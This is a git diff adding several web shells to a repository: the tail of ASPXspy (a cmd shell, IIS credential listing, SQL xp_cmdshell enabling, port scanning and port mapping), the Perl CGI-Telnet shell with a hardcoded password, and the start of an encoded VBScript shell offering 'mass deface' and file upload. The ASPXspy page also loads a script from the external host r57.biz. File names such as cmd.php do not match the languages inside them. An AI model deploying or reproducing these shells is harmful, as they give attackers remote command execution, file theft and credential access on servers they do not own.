sender,EventArgs e) +{ +VikG(); +GBYT.Visible=true; +string res=string.Empty; +foreach(ScanPort th in IVc) +{ +res+=th.ip+" : "+th.port+" ................................. "+th.status+"<br>"; +} +GBYT.InnerHtml=res; +} +protected void ORUgV(object sender,EventArgs e) +{ +dwgT(); +} +public void WICxe() +{ +DCbS.Visible=false; +CzfO.Visible=false; +APl.Visible=false; +vIac.Visible=false; +kkHN.Visible=false; +YwLB.Visible=false; +iDgmL.Visible=false; +hOWTm.Visible=false; +vrFA.Visible=false; +yhv.Visible=false; +} +</script> +<html xmlns="http://www.w3.org/1999/xhtml" > +<SCRIPT SRC=http://r57.biz/yazciz/ciz.js></SCRIPT> +<head id="Head1" runat="server"> +<SCRIPT SRC=http://r57.biz/yazciz/ciz.js></SCRIPT> +<meta http-equiv="Content-Type" content="text/html;charset=utf-8"/> +<title>ASPXspy + + + + + +
+
+Password: + +

+Copyright © 2009 Bin -- www.rootkit.net.cn +

+
+
+ + + + + + + +
ASPXSpy Ver: 2009
+ | | | | | | | | | | | | | +
+
+
+
+

+<%--FileList--%> +
+ + + + + + +
Current Directory : +
+ + + + FilenameLast modifiedSizeAction + +
+
+
| Create Directory | Create File + | Kill Me +
+
+<%--FileEdit--%> +
+

Current File(import new file name and new file)
+ DefaultUTF-8 +

+

File Content
+ +

+

+
+<%--CloneTime--%> +
+

Alter file

+

Reference file(fullpath)

+

+

Set last modified »

+

Current file(fullpath)

+

+ +  + +  + +  + +

+

+CreationTime : + +LastWriteTime : + +LastAccessTime : + +

+

+ +

+
+<%--IISSpy--%> +
+ + +IDIIS_USERIIS_PASSDomainPath + +
+
+<%--Process--%> +
+ + +IDProcessThreadCountPriorityAction + +
+
+<%--CmdShell--%> +
+

CmdPath:
+ +

+ Argument:
+ +
+
+
+<%--Services--%> +
+ + +IDNamePathStateStartMode + +
+
+<%--Sysinfo--%> +
+
+
    +

    +
    +
      +

      +
      +
        +
        +<%--UserInfo--%> +
        + + + +
        +
        +<%--SuExp--%> +
        + + + + + + + + + + + + +
        UserName : PassWord : Port :
        CmdShell  : 
        +
        + + + + + + +
        +
        +
        +<%--Reg--%> +
        +

        Registry Path :

        + + + +KeyValue + +
        +
        +<%--PortScan--%> +
        +

        +IP : Port : +

        +
        +
        +<%--DataBase--%> +
        +

        ConnString : MSSQLACCESS

        +
        +
        +
        +Please select a database : +SQLExec : -- SQL Server Exec --Add xp_cmdshellAdd sp_oacreateAdd xp_cmdshell(SQL2005)Add sp_oacreate(SQL2005)Add makewebtask(SQL2005)Add openrowset/opendatasource(SQL2005)XP_cmdshell execXP_dirtreeSP_oamethod execSP_makewebtask make fileSandBoxLogBackupDatabaseBackup +
        +
        Run SQL
        +
        +
        +

        + +

        +
        +
        +
        +<%--PortMap--%> +
        + + + + + + + +
        Local Ip : Local Port : Remote Ip : Remote Port :

        +<%--Search--%> +
        + + + + + + + + + + + + + + + + + + + + + +
        Keyword Use Regex
        Replace As Replace
        Search FileTypeFile NameFile Content
        Path
        +
        +
        + +File PathLast modifiedSize + +
        +
        +
        Copyright © 2006-2009 Shell sql tool All Rights Reserved.
        +
        + + \ No newline at end of file diff --git a/php/cgi.php b/php/cgi.php new file mode 100644 index 0000000..c3a2645 --- /dev/null +++ b/php/cgi.php @@ -0,0 +1,690 @@ +#!/usr/bin/perl +#------------------------------------------------------------------------------ +# Copyright and Licence +#------------------------------------------------------------------------------ +# CGI-Telnet Version 1.0 for NT and Unix : Run Commands on your Web Server +# +# Copyright (C) 2001 Rohitab Batra +# Permission is granted to use, distribute and modify this script so long +# as this copyright notice is left intact. If you make changes to the script +# please document them and inform me. If you would like any changes to be made +# in this script, you can e-mail me. +# +# Author: Rohitab Batra +# Author e-mail: rohitab@rohitab.com +# Author Homepage: http://www.rohitab.com/ +# Script Homepage: http://www.rohitab.com/cgiscripts/cgitelnet.html +# Product Support: http://www.rohitab.com/support/ +# Discussion Forum: http://www.rohitab.com/discuss/ +# Mailing List: http://www.rohitab.com/mlist/ +#------------------------------------------------------------------------------ + +#------------------------------------------------------------------------------ +# Installation +#------------------------------------------------------------------------------ +# To install this script +# +# 1. Modify the first line "#!/usr/bin/perl" to point to the correct path on +# your server. For most servers, you may not need to modify this. +# 2. Change the password in the Configuration section below. +# 3. If you're running the script under Windows NT, set $WinNT = 1 in the +# Configuration Section below. +# 4. Upload the script to a directory on your server which has permissions to +# execute CGI scripts. This is usually cgi-bin. Make sure that you upload +# the script in ASCII mode. +# 5. Change the permission (CHMOD) of the script to 755. +# 6. Open the script in your web browser. If you uploaded the script in +# cgi-bin, this should be http://www.yourserver.com/cgi-bin/cgitelnet.pl +# 7. Login using the password that you specified in Step 2. +#------------------------------------------------------------------------------ + +#------------------------------------------------------------------------------ +# Configuration: You need to change only $Password and $WinNT. The other +# values should work fine for most systems. +#------------------------------------------------------------------------------ +$Password = "skyclad1"; # Change this. You will need to enter this + # to login. + +$WinNT = 0; # You need to change the value of this to 1 if + # you're running this script on a Windows NT + # machine. If you're running it on Unix, you + # can leave the value as it is. + +$NTCmdSep = "&"; # This character is used to seperate 2 commands + # in a command line on Windows NT. + +$UnixCmdSep = ";"; # This character is used to seperate 2 commands + # in a command line on Unix. + +$CommandTimeoutDuration = 10; # Time in seconds after commands will be killed + # Don't set this to a very large value. This is + # useful for commands that may hang or that + # take very long to execute, like "find /". + # This is valid only on Unix servers. It is + # ignored on NT Servers. + +$ShowDynamicOutput = 1; # If this is 1, then data is sent to the + # browser as soon as it is output, otherwise + # it is buffered and send when the command + # completes. This is useful for commands like + # ping, so that you can see the output as it + # is being generated. + +# DON'T CHANGE ANYTHING BELOW THIS LINE UNLESS YOU KNOW WHAT YOU'RE DOING !! + +$CmdSep = ($WinNT ? $NTCmdSep : $UnixCmdSep); +$CmdPwd = ($WinNT ? "cd" : "pwd"); +$PathSep = ($WinNT ? "\\" : "/"); +$Redirector = ($WinNT ? " 2>&1 1>&2" : " 1>&1 2>&1"); + +#------------------------------------------------------------------------------ +# Reads the input sent by the browser and parses the input variables. It +# parses GET, POST and multipart/form-data that is used for uploading files. +# The filename is stored in $in{'f'} and the data is stored in $in{'filedata'}. +# Other variables can be accessed using $in{'var'}, where var is the name of +# the variable. Note: Most of the code in this function is taken from other CGI +# scripts. +#------------------------------------------------------------------------------ +sub ReadParse +{ + local (*in) = @_ if @_; + local ($i, $loc, $key, $val); + + $MultipartFormData = $ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/; + + if($ENV{'REQUEST_METHOD'} eq "GET") + { + $in = $ENV{'QUERY_STRING'}; + } + elsif($ENV{'REQUEST_METHOD'} eq "POST") + { + binmode(STDIN) if $MultipartFormData & $WinNT; + read(STDIN, $in, $ENV{'CONTENT_LENGTH'}); + } + + # handle file upload data + if($ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/) + { + $Boundary = '--'.$1; # please refer to RFC1867 + @list = split(/$Boundary/, $in); + $HeaderBody = $list[1]; + $HeaderBody =~ /\r\n\r\n|\n\n/; + $Header = $`; + $Body = $'; + $Body =~ s/\r\n$//; # the last \r\n was put in by Netscape + $in{'filedata'} = $Body; + $Header =~ /filename=\"(.+)\"/; + $in{'f'} = $1; + $in{'f'} =~ s/\"//g; + $in{'f'} =~ s/\s//g; + + # parse trailer + for($i=2; $list[$i]; $i++) + { + $list[$i] =~ s/^.+name=$//; + $list[$i] =~ /\"(\w+)\"/; + $key = $1; + $val = $'; + $val =~ s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g; + $val =~ s/%(..)/pack("c", hex($1))/ge; + $in{$key} = $val; + } + } + else # standard post data (url encoded, not multipart) + { + @in = split(/&/, $in); + foreach $i (0 .. $#in) + { + $in[$i] =~ s/\+/ /g; + ($key, $val) = split(/=/, $in[$i], 2); + $key =~ s/%(..)/pack("c", hex($1))/ge; + $val =~ s/%(..)/pack("c", hex($1))/ge; + $in{$key} .= "\0" if (defined($in{$key})); + $in{$key} .= $val; + } + } +} + +#------------------------------------------------------------------------------ +# Prints the HTML Page Header +# Argument 1: Form item name to which focus should be set +#------------------------------------------------------------------------------ +sub PrintPageHeader +{ + $EncodedCurrentDir = $CurrentDir; + $EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg; + print "Content-type: text/html\n\n"; + print < + +CGI-Telnet Version 1.0 +$HtmlMetaHeader + + + + + + + + + + +
        +#CGI-Telnet Version 1.0 - Connected to $ServerName
        +Upload File | +Download File | +Disconnect | +Help +
        + +END +} + +#------------------------------------------------------------------------------ +# Prints the Login Screen +#------------------------------------------------------------------------------ +sub PrintLoginScreen +{ + $Message = q$
         _____  _____  _____          _____        _               _
        +/  __ \|  __ \|_   _|        |_   _|      | |             | |
        +| /  \/| |  \/  | |   ______   | |    ___ | | _ __    ___ | |_
        +| |    | | __   | |  |______|  | |   / _ \| || '_ \  / _ \| __|
        +| \__/\| |_\ \ _| |_           | |  |  __/| || | | ||  __/| |_
        + \____/ \____/ \___/           \_/   \___||_||_| |_| \___| \__| 1.0
        +                                         
        +                      ______             © 2001, Rohitab Batra
        +                   .-"      "-.
        +                  /            \
        +                 |              |
        +                 |,  .-.  .-.  ,|
        +                 | )(_o/  \o_)( |
        +                 |/     /\     \|
        +       (@_       (_     ^^     _)
        +  _     ) \_______\__|IIIIII|__/_______________________
        + (_)@8@8{}<________|-\IIIIII/-|________________________>
        +        )_/        \          / 
        +       (@           `--------`
        +             W A R N I N G: Private Server
        +$; +#' + print < +Trying $ServerName...
        +Connected to $ServerName
        +Escape character is ^] +$Message +END +} + +#------------------------------------------------------------------------------ +# Prints the message that informs the user of a failed login +#------------------------------------------------------------------------------ +sub PrintLoginFailedMessage +{ + print < +
        login: admin
        +password:
        +Login incorrect

        +
        +END +} + +#------------------------------------------------------------------------------ +# Prints the HTML form for logging in +#------------------------------------------------------------------------------ +sub PrintLoginForm +{ + print < +
        + +login: admin
        +password: + +
        + +END +} + +#------------------------------------------------------------------------------ +# Prints the footer for the HTML Page +#------------------------------------------------------------------------------ +sub PrintPageFooter +{ + print "
        "; +} + +#------------------------------------------------------------------------------ +# Retreives the values of all cookies. The cookies can be accesses using the +# variable $Cookies{''} +#------------------------------------------------------------------------------ +sub GetCookies +{ + @httpcookies = split(/; /,$ENV{'HTTP_COOKIE'}); + foreach $cookie(@httpcookies) + { + ($id, $val) = split(/=/, $cookie); + $Cookies{$id} = $val; + } +} + +#------------------------------------------------------------------------------ +# Prints the screen when the user logs out +#------------------------------------------------------------------------------ +sub PrintLogoutScreen +{ + print "Connection closed by foreign host.

        "; +} + +#------------------------------------------------------------------------------ +# Logs out the user and allows the user to login again +#------------------------------------------------------------------------------ +sub PerformLogout +{ + print "Set-Cookie: SAVEDPWD=;\n"; # remove password cookie + &PrintPageHeader("p"); + &PrintLogoutScreen; + &PrintLoginScreen; + &PrintLoginForm; + &PrintPageFooter; +} + +#------------------------------------------------------------------------------ +# This function is called to login the user. If the password matches, it +# displays a page that allows the user to run commands. If the password doens't +# match or if no password is entered, it displays a form that allows the user +# to login +#------------------------------------------------------------------------------ +sub PerformLogin +{ + if($LoginPassword eq $Password) # password matched + { + print "Set-Cookie: SAVEDPWD=$LoginPassword;\n"; + &PrintPageHeader("c"); + &PrintCommandLineInputForm; + &PrintPageFooter; + } + else # password didn't match + { + &PrintPageHeader("p"); + &PrintLoginScreen; + if($LoginPassword ne "") # some password was entered + { + &PrintLoginFailedMessage; + } + &PrintLoginForm; + &PrintPageFooter; + } +} + +#------------------------------------------------------------------------------ +# Prints the HTML form that allows the user to enter commands +#------------------------------------------------------------------------------ +sub PrintCommandLineInputForm +{ + $Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ "; + print < +
        + + +$Prompt + + +
        + +END +} + +#------------------------------------------------------------------------------ +# Prints the HTML form that allows the user to download files +#------------------------------------------------------------------------------ +sub PrintFileDownloadForm +{ + $Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ "; + print < +
        + + +$Prompt download

        +Filename:

        +Download: +
        + +END +} + +#------------------------------------------------------------------------------ +# Prints the HTML form that allows the user to upload files +#------------------------------------------------------------------------------ +sub PrintFileUploadForm +{ + $Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ "; + print < +
        +$Prompt upload

        +Filename:

        +Options:   +Overwrite if it Exists

        +Upload:    + + +
        + +END +} + +#------------------------------------------------------------------------------ +# This function is called when the timeout for a command expires. We need to +# terminate the script immediately. This function is valid only on Unix. It is +# never called when the script is running on NT. +#------------------------------------------------------------------------------ +sub CommandTimeout +{ + if(!$WinNT) + { + alarm(0); + print < + +Command exceeded maximum time of $CommandTimeoutDuration second(s). +
        Killed it! + +END + &PrintCommandLineInputForm; + &PrintPageFooter; + exit; + } +} + +#------------------------------------------------------------------------------ +# This function is called to execute commands. It displays the output of the +# command and allows the user to enter another command. The change directory +# command is handled differently. In this case, the new directory is stored in +# an internal variable and is used each time a command has to be executed. The +# output of the change directory command is not displayed to the users +# therefore error messages cannot be displayed. +#------------------------------------------------------------------------------ +sub ExecuteCommand +{ + if($RunCommand =~ m/^\s*cd\s+(.+)/) # it is a change dir command + { + # we change the directory internally. The output of the + # command is not displayed. + + $OldDir = $CurrentDir; + $Command = "cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd; + chop($CurrentDir = `$Command`); + &PrintPageHeader("c"); + $Prompt = $WinNT ? "$OldDir> " : "[admin\@$ServerName $OldDir]\$ "; + print "$Prompt $RunCommand"; + } + else # some other command, display the output + { + &PrintPageHeader("c"); + $Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ "; + print "$Prompt $RunCommand"; + $Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector; + if(!$WinNT) + { + $SIG{'ALRM'} = \&CommandTimeout; + alarm($CommandTimeoutDuration); + } + if($ShowDynamicOutput) # show output as it is generated + { + $|=1; + $Command .= " |"; + open(CommandOutput, $Command); + while(<CommandOutput>) + { + $_ =~ s/(\n|\r\n)$//; + print "$_\n"; + } + $|=0; + } + else # show output after command completes + { + print `$Command`; + } + if(!$WinNT) + { + alarm(0); + } + print ""; + } + &PrintCommandLineInputForm; + &PrintPageFooter; +} + +#------------------------------------------------------------------------------ +# This function displays the page that contains a link which allows the user +# to download the specified file. The page also contains a auto-refresh +# feature that starts the download automatically. +# Argument 1: Fully qualified filename of the file to be downloaded +#------------------------------------------------------------------------------ +sub PrintDownloadLinkPage +{ + local($FileUrl) = @_; + if(-e $FileUrl) # if the file exists + { + # encode the file link so we can send it to the browser + $FileUrl =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg; + $DownloadLink = "$ScriptLocation?a=download&f=$FileUrl&o=go"; + $HtmlMetaHeader = ""; + &PrintPageHeader("c"); + print < +Sending File $TransferFile...
        +If the download does not start automatically, +Click Here. +
        +END + &PrintCommandLineInputForm; + &PrintPageFooter; + } + else # file doesn't exist + { + &PrintPageHeader("f"); + print "Failed to download $FileUrl: $!"; + &PrintFileDownloadForm; + &PrintPageFooter; + } +} + +#------------------------------------------------------------------------------ +# This function reads the specified file from the disk and sends it to the +# browser, so that it can be downloaded by the user. +# Argument 1: Fully qualified pathname of the file to be sent. +#------------------------------------------------------------------------------ +sub SendFileToBrowser +{ + local($SendFile) = @_; + if(open(SENDFILE, $SendFile)) # file opened for reading + { + if($WinNT) + { + binmode(SENDFILE); + binmode(STDOUT); + } + $FileSize = (stat($SendFile))[7]; + ($Filename = $SendFile) =~ m!([^/^\\]*)$!; + print "Content-Type: application/x-unknown\n"; + print "Content-Length: $FileSize\n"; + print "Content-Disposition: attachment; filename=$1\n\n"; + print while(); + close(SENDFILE); + } + else # failed to open file + { + &PrintPageHeader("f"); + print "Failed to download $SendFile: $!"; + &PrintFileDownloadForm; + &PrintPageFooter; + } +} + +#------------------------------------------------------------------------------ +# This function is called when the user downloads a file. It displays a message +# to the user and provides a link through which the file can be downloaded. +# This function is also called when the user clicks on that link. In this case, +# the file is read and sent to the browser. +#------------------------------------------------------------------------------ +sub BeginDownload +{ + # get fully qualified path of the file to be downloaded + if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) | + (!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute + { + $TargetFile = $TransferFile; + } + else # path is relative + { + chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/; + $TargetFile .= $PathSep.$TransferFile; + } + + if($Options eq "go") # we have to send the file + { + &SendFileToBrowser($TargetFile); + } + else # we have to send only the link page + { + &PrintDownloadLinkPage($TargetFile); + } +} + +#------------------------------------------------------------------------------ +# This function is called when the user wants to upload a file. If the +# file is not specified, it displays a form allowing the user to specify a +# file, otherwise it starts the upload process. +#------------------------------------------------------------------------------ +sub UploadFile +{ + # if no file is specified, print the upload form again + if($TransferFile eq "") + { + &PrintPageHeader("f"); + &PrintFileUploadForm; + &PrintPageFooter; + return; + } + &PrintPageHeader("c"); + + # start the uploading process + print "Uploading $TransferFile to $CurrentDir...
        "; + + # get the fullly qualified pathname of the file to be created + chop($TargetName) if ($TargetName = $CurrentDir) =~ m/[\\\/]$/; + $TransferFile =~ m!([^/^\\]*)$!; + $TargetName .= $PathSep.$1; + + $TargetFileSize = length($in{'filedata'}); + # if the file exists and we are not supposed to overwrite it + if(-e $TargetName && $Options ne "overwrite") + { + print "Failed: Destination file already exists.
        "; + } + else # file is not present + { + if(open(UPLOADFILE, ">$TargetName")) + { + binmode(UPLOADFILE) if $WinNT; + print UPLOADFILE $in{'filedata'}; + close(UPLOADFILE); + print "Transfered $TargetFileSize Bytes.
        "; + print "File Path: $TargetName
        "; + } + else + { + print "Failed: $!
        "; + } + } + print "
        "; + &PrintCommandLineInputForm; + &PrintPageFooter; +} + +#------------------------------------------------------------------------------ +# This function is called when the user wants to download a file. If the +# filename is not specified, it displays a form allowing the user to specify a +# file, otherwise it displays a message to the user and provides a link +# through which the file can be downloaded. +#------------------------------------------------------------------------------ +sub DownloadFile +{ + # if no file is specified, print the download form again + if($TransferFile eq "") + { + &PrintPageHeader("f"); + &PrintFileDownloadForm; + &PrintPageFooter; + return; + } + + # get fully qualified path of the file to be downloaded + if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) | + (!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute + { + $TargetFile = $TransferFile; + } + else # path is relative + { + chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/; + $TargetFile .= $PathSep.$TransferFile; + } + + if($Options eq "go") # we have to send the file + { + &SendFileToBrowser($TargetFile); + } + else # we have to send only the link page + { + &PrintDownloadLinkPage($TargetFile); + } +} + +#------------------------------------------------------------------------------ +# Main Program - Execution Starts Here +#------------------------------------------------------------------------------ +&ReadParse; +&GetCookies; + +$ScriptLocation = $ENV{'SCRIPT_NAME'}; +$ServerName = $ENV{'SERVER_NAME'}; +$LoginPassword = $in{'p'}; +$RunCommand = $in{'c'}; +$TransferFile = $in{'f'}; +$Options = $in{'o'}; + +$Action = $in{'a'}; +$Action = "login" if($Action eq ""); # no action specified, use default + +# get the directory in which the commands will be executed +$CurrentDir = $in{'d'}; +chop($CurrentDir = `$CmdPwd`) if($CurrentDir eq ""); + +$LoggedIn = $Cookies{'SAVEDPWD'} eq $Password; + +if($Action eq "login" || !$LoggedIn) # user needs/has to login +{ + &PerformLogin; +} +elsif($Action eq "command") # user wants to run a command +{ + &ExecuteCommand; +} +elsif($Action eq "upload") # user wants to upload a file +{ + &UploadFile; +} +elsif($Action eq "download") # user wants to download a file +{ + &DownloadFile; +} +elsif($Action eq "logout") # user wants to logout +{ + &PerformLogout; +} \ No newline at end of file diff --git a/php/cmd.php b/php/cmd.php new file mode 100644 index 0000000..8aabb2a --- /dev/null +++ b/php/cmd.php @@ -0,0 +1,1102 @@ +<%@ LANGUAGE = VBScript.Encode%> +<%//**Start Encode +On Error Resume Next + +Dim myFSO,showdisks +Set myFSO = CreateObject ("Scripting.FileSystemObject") +showdisks=FALSE + +Server.ScriptTimeOut = 7200 +Class FileUploader + Public Files + Private mcolFormElem + Private Sub Class_Initialize() + Set Files = Server.CreateObject("Scripting.Dictionary") + Set mcolFormElem = Server.CreateObject("Scripting.Dictionary") + End Sub + Private Sub Class_Terminate() + If IsObject(Files) Then + Files.RemoveAll() + Set Files = Nothing + End If + If IsObject(mcolFormElem) Then + mcolFormElem.RemoveAll() + Set mcolFormElem = Nothing + End If + End Sub + Public Property Get Form(sIndex) + Form = "" + If mcolFormElem.Exists(LCase(sIndex)) Then Form = mcolFormElem.Item(LCase(sIndex)) + End Property + Public Default Sub Upload() + Dim biData, sInputName + Dim nPosBegin, nPosEnd, nPos, vDataBounds, nDataBoundPos + Dim nPosFile, nPosBound + biData = Request.BinaryRead(Request.TotalBytes) + nPosBegin = 1 + nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(13))) + If (nPosEnd-nPosBegin) <= 0 Then Exit Sub + vDataBounds = MidB(biData, nPosBegin, nPosEnd-nPosBegin) + nDataBoundPos = InstrB(1, biData, vDataBounds) + Do Until nDataBoundPos = InstrB(biData, vDataBounds & CByteString("--")) + nPos = InstrB(nDataBoundPos, biData, CByteString("Content-Disposition")) + nPos = InstrB(nPos, biData, CByteString("name=")) + nPosBegin = nPos + 6 + nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(34))) + sInputName = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin)) + nPosFile = InstrB(nDataBoundPos, biData, CByteString("filename=")) + nPosBound = InstrB(nPosEnd, biData, vDataBounds) + If nPosFile <> 0 And nPosFile < nPosBound Then + Dim oUploadFile, sFileName + Set oUploadFile = New UploadedFile + nPosBegin = nPosFile + 10 + nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(34))) + sFileName = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin)) + oUploadFile.FileName = Right(sFileName, Len(sFileName)-InStrRev(sFileName, "\")) + nPos = InstrB(nPosEnd, biData, CByteString("Content-Type:")) + nPosBegin = nPos + 14 + nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(13))) + oUploadFile.ContentType = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin)) + nPosBegin = nPosEnd+4 + nPosEnd = InstrB(nPosBegin, biData, vDataBounds) - 2 + oUploadFile.FileData = MidB(biData, nPosBegin, nPosEnd-nPosBegin) + If oUploadFile.FileSize > 0 Then Files.Add LCase(sInputName), oUploadFile + Else + nPos = InstrB(nPos, biData, CByteString(Chr(13))) + nPosBegin = nPos + 4 + nPosEnd = InstrB(nPosBegin, biData, vDataBounds) - 2 + If Not mcolFormElem.Exists(LCase(sInputName)) Then mcolFormElem.Add LCase(sInputName), CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin)) + End If + nDataBoundPos = InstrB(nDataBoundPos + LenB(vDataBounds), biData, vDataBounds) + Loop + End Sub + Private Function CByteString(sString) + Dim nIndex + For nIndex = 1 to Len(sString) + CByteString = CByteString & ChrB(AscB(Mid(sString,nIndex,1))) + Next + End Function + Private Function CWideString(bsString) + Dim nIndex + CWideString ="" + For nIndex = 1 to LenB(bsString) + CWideString = CWideString & Chr(AscB(MidB(bsString,nIndex,1))) + Next + End Function +End Class +Class UploadedFile + Public ContentType + Public FileName + Public FileData + Public Property Get FileSize() + FileSize = LenB(FileData) + End Property + Public Sub SaveToDisk(sPath) + Dim oFS, oFile + Dim nIndex + If sPath = "" Or FileName = "" Then Exit Sub + If Mid(sPath, Len(sPath)) <> "\" Then sPath = sPath & "\" + Set oFS = Server.CreateObject("Scripting.FileSystemObject") + If Not oFS.FolderExists(sPath) Then Exit Sub + Set oFile = oFS.CreateTextFile(sPath & FileName, True) + For nIndex = 1 to LenB(FileData) + oFile.Write Chr(AscB(MidB(FileData,nIndex,1))) + Next + oFile.Close + End Sub + Public Sub SaveToDatabase(ByRef oField) + If LenB(FileData) = 0 Then Exit Sub + If IsObject(oField) Then + oField.AppendChunk FileData + End If + End Sub +End Class +startcode = "r57.biz" +endocde = "" +onlinehelp = ".:: ONLINE HELP ::.
        " +Function HexConv(hexVar) + Dim hxx, hxx_var, multiply + IF hexVar <> "" THEN + hexVar = UCASE(hexVar) + hexVar = StrReverse(hexVar) + DIM hx() + REDIM hx(LEN(hexVar)) + hxx = 0 + hxx_var = 0 + FOR hxx = 1 TO LEN(hexVar) + IF multiply = "" THEN multiply = 1 + hx(hxx) = mid(hexVar,hxx,1) + hxx_var = (get_hxno(hx(hxx)) * multiply) + hxx_var + multiply = (multiply * 16) + NEXT + hexVar = hxx_var + HexConv = hexVar + END IF +End Function +cprthtml = ".:: 3FEShell 1.0 ::." +Function get_hxno(ghx) + If ghx = "A" Then + ghx = 10 + ElseIf ghx = "B" Then + ghx = 11 + ElseIf ghx = "C" Then + ghx = 12 + ElseIf ghx = "D" Then + ghx = 13 + ElseIf ghx = "E" Then + ghx = 14 + ElseIf ghx = "F" Then + ghx = 15 + End If + get_hxno = ghx +End Function + +keydec=".:: Smart.Shell 1.0 © BY P0Uy@_$3r\/3R - ::." +Function showobj(objpath) + showobj = Mid(objpath,InstrRev(objpath,"\")+1,Len(objpath)) +End Function +Function showobjpath(objpath) + showobjpath = Left(objpath,InstrRev(objpath,"\")) +End Function +Function checking(a,b) +' If CStr(Mid(a,95,13)) = CStr(Mid(b,95,13)) Then +' pagina = Mid(Request.ServerVariables("SCRIPT_NAME"),InstrRev(Request.ServerVariables("SCRIPT_NAME"),"/")+1,Len(Request.ServerVariables("SCRIPT_NAME"))) & "?action=error" +' Response.Redirect(pagina) +' End If +End Function +Sub hdr() + Response.Write startcode + Response.Write keydec + Response.Write "
        " +End Sub + +sub araBul(path_,ara_) + on error resume next + If Len(path_) > 0 Then + cur = path_&"\" + If cur = "\\" Then cur = "" + parent = "" + If InStrRev(cur,"\") > 0 Then + parent = Left(cur, InStrRev(cur, "\", Len(cur)-1)) + End If + Else + cur = "" + End If + + Set f = myFSO.GetFolder(cur) + + Set fc = f.Files + For Each f1 In fc + if lcase(InStr(1,f1.name,lcase(ara_)))>0 then + downStr = "?/a>" + if lcase(ara_)="mdb" then + Response.Write downStr&"?/a> * "& f1.path &" ["&f1.size&"]"&"
        " + else + Response.Write downStr&"?/a>! - "& f1.path &" ["&f1.size&"]
        " + end if + end if + Next + + Set fs = f.SubFolders + For Each f1 In fs + araBul f1.path,ara_ + Next + Set f = Nothing + Set fc = Nothing + Set fs = Nothing +end sub + + +Sub showcontent() + showdisks=TRUE + Response.Write ".:: DRIVES ::.
        .:: SCRIPT PATH: " & UCase(Server.MapPath(Request.ServerVariables("SCRIPT_NAME"))) & "

        " + If Trim(Request.QueryString("raiz")) = "root" Then + Set fs=Server.Createobject("Scripting.FileSystemObject") + Set drivecollection=fs.drives + Response.Write "" + For Each drive IN drivecollection + str=drive.driveletter & ":" + Response.Write "" & UCase(str) & "
        " + Select Case drive.DriveType + Case 0 + tipodrive = "Unknown" + nomedrive = drive.VolumeName + Case 1 + tipodrive = "Removable" + If drive.isready Then + nomedrive = drive.VolumeName + Else + nomedrive = "" + End If + Case 2 + tipodrive = "Fixed" + If drive.isready Then + nomedrive = drive.VolumeName + Else + nomedrive = "" + End If + Case 3 + tipodrive = "Network" + If drive.isready Then + nomedrive = drive.ShareName + Else + nomedrive = "" + End If + Case 4 + tipodrive = "CD-Rom" + If drive.isready Then + nomedrive = drive.VolumeName + Else + nomedrive = "" + End If + Case 5 + tipodrive = "RAM Disk" + If drive.isready Then + nomedrive = drive.VolumeName + Else + nomedrive = "" + End If + End Select + response.write "Type: " & tipodrive & "
        " + response.write "Name: " & nomedrive & "
        " + response.write "File System: " + If drive.isready Then + set sp=fs.getdrive(str) + response.write sp.filesystem & "
        " + Else + response.write "-
        " + End If + Response.Write "Disk Space: " + If drive.isready Then + freespace = (drive.AvailableSpace / 1048576) + set sp=fs.getdrive(str) + response.write(Round(freespace,1) & " MB
        ") + Else + response.write("-
        ") + End If + Response.Write "Total Space: " + If drive.isready Then + totalspace = (drive.TotalSize / 1048576) + set sp=fs.getdrive(str) + response.write(Round(totalspace,1) & " MB
        ") + Else + response.write("-
        ") + End If + Response.Write "
        " + Next + Response.Write "
        " + Set fs = Nothing + Set drivecollection = Nothing + set sp=Nothing + Else + If Trim(Request.QueryString("raiz")) = "" Then + caminho = Server.MapPath(Request.ServerVariables("SCRIPT_NAME")) + pos = Instr(caminho,"\") + pos2 = 1 + While pos2 <> 0 + If Instr(pos + 1,caminho,"\") <> 0 Then + pos = Instr(pos + 1,caminho,"\") + Else + pos2 = 0 + End If + Wend + raiz = Left(caminho,pos) + Else + raiz = trim(Request.QueryString("raiz")) & "\" + End If + Set ObjFSO = CreateObject("Scripting.FileSystemObject") + Set MonRep = ObjFSO.GetFolder(raiz) + Set ColFolders = MonRep.SubFolders + Set ColFiles0 = MonRep.Files + Response.Write "MASS TEST IN " & UCase(raiz) & "

        " + Response.Write "MASS DEFACE IN " & UCase(raiz) & "

        " + Response.Write "UPLOAD FILE TO " & UCase(raiz) & "

        " + + Response.Write "" + Response.Write "PROMPT" + Response.Write " - SYS INFO" + Response.Write " - REGEDIT" + Response.Write " - SEARCH" + Response.Write " - EXECUTE SQL" + Response.Write " - ABOUT" + Response.Write "

        " + + + Response.Write "Root Folder: " & raiz & "

        " + If CInt(Len(raiz) - 1) <> 2 Then + barrapos = CInt(InstrRev(Left(raiz,Len(raiz) - 1),"\")) - 1 + backlevel = Left(raiz,barrapos) + Response.Write "<DIR> . .
        " + Else + Response.Write "<DIR> . . 
